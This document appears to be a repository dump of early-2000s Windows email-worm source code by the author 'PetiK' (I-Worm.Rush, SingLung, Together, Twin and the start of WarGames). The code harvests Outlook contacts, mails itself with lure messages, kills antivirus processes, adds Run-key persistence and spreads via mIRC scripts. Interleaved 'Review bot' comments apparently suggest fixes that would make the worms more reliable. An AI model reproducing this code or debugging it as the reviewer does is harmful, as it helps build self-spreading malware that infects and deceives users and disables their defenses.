@pushsz "C:\rushhour.vbs"
callx DeleteFileA
push offset SystemTime
callx GetSystemTime
cmp [SystemTime.wDay],0Fh
jne start_scan
call internet_page
start_scan:
mov edi,offset mailbook
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,"iaM\"
stosd
mov eax,"ooBl"
stosd
mov eax,"xt.k"
stosd
mov ax,"t"
stosd
xor eax,eax
stosd
open_scan_file:
pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset mailbook
callx CreateFileA
inc eax
je not_exist
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je F1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi
push 0
push ebx
callx GetFileSize
cmp eax,3
jbe F3
scan_file:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"#"
je f_mail
cmp al,"@"
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je scan_file
call send_mail
jmp scan_file
entr2: xor al,al
stosb
pop edi
jmp scan_file
f_mail:
F3: push esi
callx UnmapViewOfFile
F2: push ebp
callx CloseHandle
F1: push ebx
callx CloseHandle
not_exist:
popad
scan_window:mov counter,0
win1: inc counter
cmp counter,1000000
je end_w
@pushsz "Norton AntiVirus"
push 00h
callx FindWindowA
test eax,eax
jz win2
jmp change_nav
win2: @pushsz "System Properties"
push 00h
callx FindWindowA
test eax,eax
jz win3
jmp show_window
win3: @pushsz "Microsoft Home Page - Microsoft Internet Explorer"
push 00h
callx FindWindowA
test eax,eax
jz win1
jmp display_message
change_nav:
mov edi,eax
@pushsz "Norton Virus : W32.Norton.Worm@mm"
push edi
callx SetWindowTextA
jmp win1
show_window:
mov edi,eax
push 2
push edi
callx ShowWindow
jmp win1
display_message:
mov edi,eax
push 10h
@pushsz "Microsoft Internet Explorer"
@pushsz "You don't have access to this page"
push 00h
callx MessageBoxA
push 0
push edi
callx ShowWindow
jmp win1
end_w: push 00h
callx ExitProcess
hide_worm:
pushad
@pushsz "Kernel32.dll"
callx GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm
@pushsz "RegisterServiceProcess"
push ecx
callx GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
internet_page:
pushad
call diff_val
db "Search Page",0
db "Start Page",0
db "Local Page",0
diff_val:
pop esi
push 3
pop ecx
page_loop:
push ecx
push 32
@pushsz "http://www.petik.fr.fm"
push 1
push esi
@pushsz "Software\Microsoft\Internet Explorer\Main"
push 80000001h
callx SHSetValueA
@endsz
pop ecx
loop page_loop
popad
ret
send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [MAPIHdl]
callx MAPISendMail
ret
.data
; === copy_worm ===
orig_worm db 50 dup (0)
copy_worm db 50 dup (0)
; === beep ===
counter dd ?
; === special_folder ===
personal db 70 dup (0)
octets dd ?
FileHdl dd ?
; === scan email ===
mailbook db 50 dup (0)
mail_addr db 128 dup (?)
MAPIHdl dd 0
name_mail db "ScanVir_25.exe",0
subject db "New Scan Virus...",0
body db "Hi man,",0dh,0ah
db "I send you the last update of ScanVir (v 2.5).",0dh,0ah
db "Look at the file attached.",0dh,0ah,0dh,0ah
db 09h,09h,09h,09h,"Bye and have a nice day.",0
namefrom db "Your Best Friend",0
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd namefrom
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset name_mail
dd ?
txtd: db "Hi man,",0dh,0ah,0dh,0ah
db "I don't want to destroy your computer.",0dh,0ah
db "But other programs are more dangerous.",0dh,0ah,0dh,0ah,0dh,0ah
db 09h,09h,09h,"PetiK",00h
TXTSIZE equ $-txtd
vbsd: db 'On Error Resume Next',0dh,0ah
db 'Set rush=CreateObject("Outlook.Application")',0dh,0ah
db 'Set chan=rush.GetNameSpace("MAPI")',0dh,0ah
db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set txt=fso.CreateTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt")',0dh,0ah
db 'txt.Close',0dh,0ah
db 'For Each M In chan.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O=1 To M.AddressEntries.Count',0dh,0ah
db 'Set P=M.AddressEntries(O)',0dh,0ah
db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt",8,true)',0dh,0ah
db 'txt.WriteLine P.Address',0dh,0ah
db 'txt.Close',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt",8,true)',0dh,0ah
db 'txt.WriteLine "#"',0dh,0ah
db 'txt.Close',0dh,0ah
VBSSIZE equ $-vbsd
signature db "I-Worm.Rush",00h
origine db "A worm made in France",00h
author db "Written by PetiK - 2001",00h
end start
end
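Review bot: The `scan_file` loop at `p_c:` reads the mapped MailBook.txt with `lodsb` until it sees `#` and copies each line into the 128-byte `mail_addr` with `stosb`, so neither the `GetFileSize` result (only compared against 3) nor the buffer length bounds the loop; a MailBook.txt whose trailing `#` has not been written yet — the worm waits only `Sleep 2000` for the dropped script before scanning — can walk off the mapping, and a line over 127 bytes overwrites `MAPIHdl` and the message structures that follow. The `f_mail:` exit also leaves the `push edi` from `scan_file` on the stack before `popad`, so the registers restored at `not_exist:` are shifted by one slot; `f_mail: pop edi` fixes that. The `car_s: inc esi` branch additionally skips the character after each space, since `lodsb` has already advanced esi. A size-bounded scan could reuse the existing `counter` variable (MAPISendMail may clobber ecx/edx across `call send_mail`): `mov counter,eax` after the `cmp eax,3` check, then `dec counter` / `jz f_mail` ahead of `lodsb`, plus a compare of edi against `offset mail_addr+127` before `stosb`.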

Win32/I-Worm.SingLung.c Normal file

@ -0,0 +1,340 @@
/*
Name : I-Worm.SingLung
Author : PetiK
Date : January 23rd 2002 - January 26th 2002
Language : C++/Win32asm
Greetz to Bumblebee (I-Worm.Plage and I-Worm.Rundll);
*/
#include <stdio.h>
#include <windows.h>
#include <mapi.h>
#include <tlhelp32.h>
#pragma argused
#pragma inline
char filename[100],sysdir[100],sysdr[100],winhtm[100];
LPSTR Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
int i;
HANDLE fd,lSnapshot,myproc;
BOOL rProcessFound;
BYTE desktop[50],favoris[50],personal[50],cache[50];
DWORD sizcache=sizeof(desktop),sizfavoris=sizeof(favoris),
sizpersonal=sizeof(personal),sizdesktop=sizeof(cache);
DWORD type=REG_SZ;
FILE *stopv;
LHANDLE session;
MapiMessage mess;
MapiRecipDesc from;
HINSTANCE hMAPI;
HKEY hReg;
PROCESSENTRY32 uProcess;
SYSTEMTIME systime;
WIN32_FIND_DATA ffile;
HDC dc;
void Welcome();
void StopAV(char *);
void FindFile(char *,char *);
void GetMail(char *,char *);
void sendmail(char *);
void FeedBack();
//ULONG (PASCAL FAR *RegSerPro)(ULONG, ULONG);
ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
/*
// Worm in RegisterServiceProcess
HMODULE kern32=GetModuleHandle("KERNEL32.DLL");
if(kern32) {
(FARPROC &)RegSerPro=GetProcAddress(kern32,"RegisterServiceProcess");
if(RegSerPro)
RegSerPro(NULL,1);
} */
// Fuck some AntiVirus hahahaha
StopAV("AVP32.EXE"); // AVP
StopAV("AVPCC.EXE"); // AVP
StopAV("AVPM.EXE"); // AVP
StopAV("WFINDV32.EXE"); // Dr. Solomon
StopAV("F-AGNT95.EXE"); // F-Secure
StopAV("NAVAPW32.EXE"); // Norton Antivirus
StopAV("NAVW32.EXE"); // Norton Antivirus
StopAV("NMAIN.EXE"); // Norton Antivirus
StopAV("PAVSCHED.EXE"); // Panda AntiVirus
StopAV("ZONEALARM.EXE"); // ZoneAlarm
GetModuleFileName(hInst,filename,100);
GetSystemDirectory((char *)sysdir,100);
strcpy(sysdr,sysdir);
strcat(sysdr,"\\MSGDI32.EXE");
if((lstrcmp(filename,sysdr))!=0) {
Welcome();
}
else
{
hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache);
RegCloseKey(hReg);
GetWindowsDirectory((char *)winhtm,100);
_asm
{
call @wininet
db "WININET.DLL",0
@wininet:
call LoadLibrary
test eax,eax
jz end_asm
mov ebp,eax
call @inetconnect
db "InternetGetConnectedState",0
@inetconnect:
push ebp
call GetProcAddress
test eax,eax
jz end_wininet
mov edi,eax
verf:
push 0
push Tmp
call edi
dec eax
jnz verf
end_wininet:
push ebp
call FreeLibrary
end_asm:
jmp end_all_asm
Tmp dd 0
end_all_asm:
}
FindFile(desktop,"*.htm");
FindFile(favoris,"*.ht*");
FindFile(personal,"*.ht*");
FindFile(personal,"*.doc");
FindFile(winhtm,".ht*");
FindFile(cache,".ht*");
FreeLibrary(hMAPI);
FeedBack();
}
strcat(sysdir,"\\MsGDI32.exe");
CopyFile(filename,sysdir,FALSE);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"Microsoft GDI 32 bits",0,REG_SZ,(BYTE *)sysdir,100);
RegCloseKey(hReg);
}
void Welcome()
{
register char fileWel[100],messWel[25],titWel[25];
strcpy(fileWel,filename);
fileWel[0]=0;
for(i=strlen(filename);i>0 && filename[i]!='\\';i--);
wsprintf(titWel,"Error - %s",fileWel+i+1);
wsprintf(messWel,"File - %s - damaged.\nCannot open this file.",fileWel+i+1);
MessageBox(NULL,messWel,titWel,MB_OK|MB_ICONHAND);
}
void StopAV(char *antivirus)
{
register BOOL term;
lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
uProcess.dwSize=sizeof(uProcess);
rProcessFound=Process32First(lSnapshot,&uProcess);
while(rProcessFound) {
if(strstr(uProcess.szExeFile,antivirus)!=NULL) { // Norton Antivirus
myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
if(myproc!=NULL) {
term=TerminateProcess(myproc,0);
}
CloseHandle(myproc);
}
rProcessFound=Process32Next(lSnapshot,&uProcess);
}
CloseHandle(lSnapshot);
}
void FindFile(char *folder, char *ext)
{
register bool abc=TRUE;
register HANDLE hFile;
char mail[128];
SetCurrentDirectory(folder);
hFile=FindFirstFile(ext,&ffile);
if(hFile!=INVALID_HANDLE_VALUE) {
while(abc) {
SetFileAttributes(ffile.cFileName,FILE_ATTRIBUTE_ARCHIVE);
GetMail(ffile.cFileName,mail);
if(strlen(mail)>0) {
WritePrivateProfileString("EMail found",mail,"send","singlung.txt");
sendmail(mail);
}
abc=FindNextFile(hFile,&ffile);
}
}
}
void GetMail(char *namefile, char *mail)
{
HANDLE hf,hf2;
char *mapped;
DWORD size,i,k;
BOOL test=FALSE,valid=FALSE;
mail[0]=0;
hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,0);
if(hf==INVALID_HANDLE_VALUE)
return;
size=GetFileSize(hf,NULL);
if(!size)
return;
if(size<8)
return;
size-=100;
hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0);
if(!hf2) {
CloseHandle(hf);
return;
}
mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0);
if(!mapped) {
CloseHandle(hf2);
CloseHandle(hf);
return;
}
i=0;
while(i<size && !test) {
if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) {
test=TRUE;
i+=strlen("mailto:");
k=0;
while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) {
if(mapped[i]!=' ') {
mail[k]=mapped[i];
k++;
if(mapped[i]=='@')
valid=TRUE;
}
i++;
}
mail[k]=0;
} else
i++;
}
if(!valid)
mail[0]=0;
UnmapViewOfFile(mapped);
CloseHandle(hf2);
CloseHandle(hf);
return;
}
void sendmail(char *tos)
{
memset(&mess,0,sizeof(MapiMessage));
memset(&from,0,sizeof(MapiRecipDesc));
from.lpszName=NULL;
from.ulRecipClass=MAPI_ORIG;
mess.lpszSubject="Secret for you...";
mess.lpszNoteText="Hi Friend,\n\n"
"I send you my last work.\n"
"Mail me if you have some suggests.\n\n"
" See you soon. Best Regards.";
mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
if(!mess.lpRecips)
return;
memset(mess.lpRecips,0,sizeof(MapiRecipDesc));
mess.lpRecips->lpszName=tos;
mess.lpRecips->lpszAddress=tos;
mess.lpRecips->ulRecipClass=MAPI_TO;
mess.nRecipCount=1;
mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
if(!mess.lpFiles)
return;
memset(mess.lpFiles,0,sizeof(MapiFileDesc));
mess.lpFiles->lpszPathName=filename;
mess.lpFiles->lpszFileName="My_Work.exe";
mess.nFileCount=1;
mess.lpOriginator=&from;
mSendMail(0,0,&mess,0,0);
free(mess.lpRecips);
free(mess.lpFiles);
}
void FeedBack()
{
GetSystemTime(&systime);
switch(systime.wDay) {
case 7:
MessageBox(NULL,"It is not with a B-52 that you will stop terrorist groups.\n"
"With this, you stop the life of women and children.",
"Message to USA",MB_OK|MB_ICONHAND);
break;
case 11:
dc=GetDC(NULL);
if(dc)
{
TextOut(dc,300,300,"Can we try to stop the conflicts ? YES OF COURSE !",50);
}
ReleaseDC(NULL,dc);
break;
case 28:
stopv=fopen("StopIntifada.htm","w");
fprintf(stopv,"<html><head><title>Stop Violence between Palestinians and Israeli</title></head>\n");
fprintf(stopv,"<body bgcolor=blue text=yellow>\n");
fprintf(stopv,"<p align=\"center\"><font size=\"5\">HOW TO STOP THE VIOLENCE</font></p><BR>\n");
fprintf(stopv,"<p align=\"left\"><font size=\"3\">-THE ISRAELIS:</font><BR>\n");
fprintf(stopv,"<font>To take the israelis tank out of the palestinians autonomous city.</font><BR>\n");
fprintf(stopv,"<font>Don't bomb civil place after a terrorist bomb attack.</font><BR>\n");
fprintf(stopv,"<font>To arrest and to kill the leaders of terrorist groups.</font><BR><BR>\n");
fprintf(stopv,"<font>-THE PALESTINIANS:</font><BR>\n");
fprintf(stopv,"<font>To stop to provoke the israelis army.</font><BR>\n");
fprintf(stopv,"<font>To stop the terrorist attacks.</font><BR><BR>\n");
fprintf(stopv,"<font>-THE BOTH:</font><BR>\n");
fprintf(stopv,"<font>To try to accept the other people.</font><BR>\n");
fprintf(stopv,"<font>TO ORGANIZE A MEETING BETWEEN ARIEL SHARON AND YASSER ARAFAT !</font><BR><BR>\n");
fprintf(stopv,"<font>Thanx to read this.</font></p>\n");
fprintf(stopv,"</body></html>");
fclose(stopv);
ShellExecute(NULL,"open","StopIntifada.htm",NULL,NULL,SW_SHOWMAXIMIZED);
break;
}
}
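Review bot: Welcome() at L1368-1373 formats `"File - %s - damaged.\nCannot open this file."` plus the executable's base name into `messWel[25]`, and the format text alone is over 40 bytes, so wsprintf overruns the stack buffer on every call; `titWel[25]` overflows too once the base name exceeds 16 characters. Size them as `char messWel[MAX_PATH+64], titWel[MAX_PATH+16];` or use `_snprintf` with `sizeof`. GetMail also returns at the `!size` and `size<8` checks without closing `hf`, and `size-=100` wraps the unsigned DWORD for files of 8..99 bytes so the scan loop walks past the end of the mapping; a minimal fix is `if(size<=100){CloseHandle(hf);return;}` before the subtraction. For analysts, the header comment should record the artifacts the code visibly produces: the copy to `%SystemRoot%\System32\MsGDI32.exe`, the HKLM Run value "Microsoft GDI 32 bits", and the `singlung.txt` INI written relative to whatever folder FindFile last set as current directory.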

514
Win32/I-Worm.Together.asm Normal file

@ -0,0 +1,514 @@
comment #
Name : I-Worm.Together
Author : PetiK
Date : March 10th 2002 - March 15th 2002
#
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
PROCESSENTRY32 STRUCT
dwSize DWORD ?
cntUsage DWORD ?
th32ProcessID DWORD ?
th32DefaultHeapID DWORD ?
th32ModuleID DWORD ?
cntThreads DWORD ?
th32ParentProcessID DWORD ?
pcPriClassBase DWORD ?
dwFlags DWORD ?
szExeFile db 260 dup(?)
PROCESSENTRY32 ENDS
include Useful.inc
start_worm: call hide_worm
twin_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA ; esi = name of file
push 50
push offset verif_worm
api GetSystemDirectoryA
@pushsz "\EBASE64.EXE"
push offset verif_worm
api lstrcat
mov edi,offset copy_worm
push edi
push 50
push edi
api GetSystemDirectoryA
add edi,eax
mov eax,"aBe\"
stosd
mov eax,"46es"
stosd
mov eax,"exe."
stosd
pop edi ; edi = %system%\eBase64.exe
push offset orig_worm
push offset verif_worm
api lstrcmp
test eax,eax
jz continue_worm
push 0
push edi
push esi
api CopyFileA ; copy file
push 20
push edi
push 1
@pushsz "Encode Base64"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA ; regedit
jmp end_worm
continue_worm:
fuck_antivirus:
@pushsz "OIFIL400.DLL"
api LoadLibraryA
test eax,eax
jz end_fuck_antivirus
push 0
push 2
api CreateToolhelp32Snapshot
mov lSnapshot, eax
inc eax
jz end_fuck_antivirus
lea eax,uProcess
mov [eax.dwSize], SIZE PROCESSENTRY32
lea eax,uProcess
push eax
push lSnapshot
api Process32First
checkfile:
test eax, eax
jz InfExpRetCl
push ecx
mov eax,ProcessID
push offset uProcess
cmp eax,[uProcess.th32ProcessID]
je NextFile
lea ebx,[uProcess.szExeFile]
verif macro verifname,empty
local name
ifnb <empty>
%out too much arguments in macro 'nxt_instr'
.err
endif
call name
db verifname,0
name:
push ebx
api lstrstr
test eax,eax
endm
verif "ARG" ; Norton
jnz term
verif "AVP32.EXE" ; AVP
jnz term
verif "AVPCC.EXE" ; AVP
jnz term
verif "AVPM.EXE" ; AVP
jnz term
verif "WFINDV32.EXE"
jnz term
verif "F-AGNT95.EXE" ; F-SECURE
jnz term
verif "NAVAPW32.EXE" ; Norton
jnz term
verif "NAVW32.EXE" ; Norton
jnz term
verif "NMAIN.EXE"
jnz term
verif "PAVSHED.EXE" ; PandaSoftware
jnz term
verif "vshwin32.exe" ; McAfee
jnz term
verif "PETIKSHOW.EXE" ; McAfee
jnz term
@pushsz "ZONEALARM.EXE"
push ebx
api lstrstr
test eax,eax
jz NextFile
term: push [uProcess.th32ProcessID]
push 1
push 001F0FFFh
api OpenProcess
test eax,eax
jz NextFile
push 0
push eax
api TerminateProcess
push ebx
push offset new_name
api lstrcpy
mov esi,offset new_name
push esi
api lstrlen
add esi,eax
sub esi,4
mov [esi],"ktp."
lodsd
; mov [esi],"kmz."
; lodsd
push 0
push offset new_name
push ebx
api CopyFileA
push ebx
api DeleteFileA
NextFile:
push offset uProcess
push lSnapshot
api Process32Next
jmp checkfile
InfExpRetCl:
push lSnapshot
api CloseHandle
end_fuck_antivirus:
call Spread_Mirc
call Spread_Worm
e_s_w:
end_worm:
push 0
api ExitProcess
hide_worm Proc
pushad
@pushsz "KERNEL32.DLL"
api GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm
@pushsz "RegisterServiceProcess" ; Registered as Service Process
push ecx
api GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
hide_worm EndP
Spread_Mirc Proc
push offset copy_worm
push offset mirc_exe
api lstrcpy
call @mirc
db "C:\mirc\script.ini",0
db "C:\mirc32\script.ini",0 ; spread with mIRC. Thanx to Microsoft.
db "C:\progra~1\mirc\script.ini",0
db "C:\progra~1\mirc32\script.ini",0
@mirc:
pop esi
push 4
pop ecx
mirc_loop:
push ecx
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push esi
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
@tmp_mirc:
push e_mirc - s_mirc
push offset s_mirc
push ebp
api WriteFile
push ebp
api CloseHandle
@endsz
pop ecx
loop mirc_loop
end_spread_mirc:
ret
Spread_Mirc EndP
Spread_Worm Proc
pushad
push 50
push offset vbs_worm
api GetSystemDirectoryA
@pushsz "\eBase.vbs"
push offset vbs_worm
api lstrcat
push 0
push 20h
push 2
push 0
push 1
push 40000000h
push offset vbs_worm
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
push e_vbs - s_vbs
push offset s_vbs
push ebp
api WriteFile
push ebp
api CloseHandle
push 1
push 0
push 0
push offset vbs_worm
@pushsz "open"
push 0
api ShellExecuteA
verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet
push 50
push offset t_ini
api GetSystemDirectoryA
@pushsz "\together.ini"
push offset t_ini
api lstrcat
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset t_ini
api CreateFileA
inc eax
je end_spread_worm
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
api CreateFileMappingA
test eax,eax
je end_s1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_s2
xchg eax,esi
push 0
push ebx
api GetFileSize
cmp eax,4
jbe end_s3
scan_mail:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,";"
je end_m
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
end_m: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
f_mail:
end_s3: push esi
api UnmapViewOfFile
end_s2: push ebp
api CloseHandle
end_s1: push ebx
api CloseHandle
end_spread_worm:
popad
jmp e_s_w
Spread_Worm EndP
send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [sess]
api MAPISendMail
ret
.data
; === Copy Worm ===
orig_worm db 50 dup (0)
copy_worm db 50 dup (0)
verif_worm db 50 dup (0)
sysTime db 16 dup(0)
; === Fuck AntiVirus ===
uProcess PROCESSENTRY32 <?>
ProcessID dd ?
lSnapshot dd ?
new_name db 100 dup (?)
; === Spread With mIrc ===
s_mirc: db "[script]",CRLF
db ";Don't edit this file.",CRLF,CRLF
db "n0=on 1:JOIN:{",CRLF
db "n1= /if ( $nick == $me ) { halt }",CRLF
db "n2= /.dcc send $nick "
mirc_exe db 50 dup (?)
db CRLF,"n3=}",0
e_mirc:
byte_write dd ?
; === Spread with Outlook ===
vbs_worm db 50 dup (0)
t_ini db 50 dup (0)
mail_addr db 128 dup (?)
inet dd 0
sess dd 0
subject db "Re: Answer",0
body db "Here for you...",0
filename db "funny_game.exe",0
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset filename
dd ?
s_vbs:
db 'On Error Resume Next',CRLF
db 'Set fs=CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set sys=fs.GetSpecialFolder(1)',CRLF
db 'Set c=fs.CreateTextFile(sys&"\together.ini")',CRLF
db 'c.Close',CRLF
db 'Set ou=CreateObject("Outlook.Application")',CRLF
db 'Set map=ou.GetNameSpace("MAPI")',CRLF
db 'adr=""',CRLF
db 'For Each mel in map.AddressLists',CRLF
db 'If mel.AddressEntries.Count <> 0 Then',CRLF
db 'For O=1 To mel.AddressEntries.Count',CRLF
db 'adr=adr &";"& mel.AddressEntries(O).Address',CRLF
db 'Next',CRLF
db 'End If',CRLF
db 'Next',CRLF
db 'adr=adr &";#"',CRLF,CRLF
db 'Set c=fs.OpenTextFile(sys&"\together.ini",2)',CRLF
db 'c.WriteLine adr',CRLF
db 'c.Close',CRLF
e_vbs:
signature db "I-Worm.Together "
author db "Coded by PetiK - 2002",00h
end start_worm
end
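Review bot: The address scanner at L1860-1884 copies bytes into `mail_addr` (128 bytes, L1929) until it sees `;` or `#` with no length check, so a together.ini entry longer than 127 bytes overwrites `inet`, `sess` and the MAPI `Message` block that follow it in .data; bound the copy, e.g. compute `lea eax,[edi+127]` before the loop and add `cmp edi,eax` / `jae end_m` in `not_a`. The same loop has no end-of-mapping check and relies entirely on the `#` terminator the VBS writes, so a truncated or hand-edited file is read past the view. In `fuck_antivirus`, `ProcessID` (L1913) is declared but never written, so the self-skip compare at L1632-1635 tests against 0 and never matches; and `push ecx` at L1631 plus `push offset uProcess` at L1633 appear to have no matching pop or callee cleanup, leaving the stack 8 bytes deeper on every process iterated. `Spread_Mirc` also never tests the `CreateFileA` result before `WriteFile`, so a missing mIRC directory produces a `WriteFile` on INVALID_HANDLE_VALUE.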

198
Win32/I-Worm.Twin.asm Normal file

@ -0,0 +1,198 @@
comment #
Name : I-Worm.Twin
Author : PetiK
Date : January 30th 2002 - February 1st 2002
Size : 6656 bytes
Action : See yourself. It's not complex.
#
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include useful.inc
include myinclude.inc
start: push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA
push 25
push esi
push 1
@pushsz "AntiVirus Freeware"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA
@pushsz "C:\twin.vbs"
api DeleteFileA
push 50
push offset pathname
api GetWindowsDirectoryA
@pushsz "\NetInfo.doc"
push offset pathname
api lstrcat
verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet
push 0
push 0
push 3
push 0
push 1
push 80000000h
@pushsz "C:\backup.win"
api CreateFileA
inc eax
je end_worm
dec eax
xchg ebx,eax
push 0
push 0
push 0
push 2
push 0
push ebx
api CreateFileMappingA
test eax,eax
je end_w1
xchg eax,ebp
push 0
push 0
push 0
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_w2
xchg eax,esi
push 0
push ebx
api GetFileSize
cmp eax,3
jbe end_w3
scan_mail:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
entr2: xor al,al
stosb
pop edi
jmp scan_mail
f_mail:
end_w3: push esi
api UnmapViewOfFile
end_w2: push ebp
api CloseHandle
end_w1: push ebx
api CloseHandle
end_worm:
push 0
api ExitProcess
send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [sess]
api MAPISendMail
ret
.data
orig_worm db 50 dup (0)
pathname db 50 dup (0)
mail_addr db 128 dup (?)
inet dd 0
sess dd 0
subject db "A comical story for you.",0
body db "I send you a comical story found on the Net.",0dh,0ah,0dh,0ah
db 9,"Best Regards. You friend.",0
filename db "comical_story.doc",0
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset pathname
dd offset filename
dd ?
end start
end
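Review bot: The Run-key write at L2017-2023 passes `push 25` as the data length for `orig_worm`, so any module path longer than 24 characters is stored truncated and without a terminating NUL and the persistence entry points at a non-existent file; `GetModuleFileNameA` already returns the copied length in eax at L2016, so `inc eax` / `push eax` in place of `push 25` fixes it. The scan loop at L2074-2104 copies into `mail_addr` (128 bytes) with no upper bound and stops only on the `#` sentinel, so an over-long or sentinel-less backup.win overwrites `inet`/`sess`/`Message` or reads past the mapping; the `GetFileSize` result at L2071 should become the loop limit instead of a one-off `cmp eax,3`. The `sess dd 0` passed to MAPISendMail at L2121 is never filled by a MAPILogon, which is fine for the simple-MAPI implicit-session path but should be stated in a comment.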

379
Win32/I-Worm.WarGames.c Normal file

@ -0,0 +1,379 @@
/*
Name : I-Worm.WarGames
Author : PetiK
Date : February 12th 2002 - February 22th 2002
Language : C++/Win32asm
*/
#include <stdio.h>
#include <windows.h>
#include <mapi.h>
#include <tlhelp32.h>
#pragma argused
#pragma inline
char filename[100],sysdir[100],copyr[50]="w",winhtm[100],subj[50];
int num,counter=0;
char *alph[]={"a","b","c","d","e","f","g","h","i","j","k","l","m",
"n","o","p","q","r","s","t","u","v","w","x","y","z"};
char dn[20]="Wargames Uninstall",ust[40]="rundll32 mouse,disable";
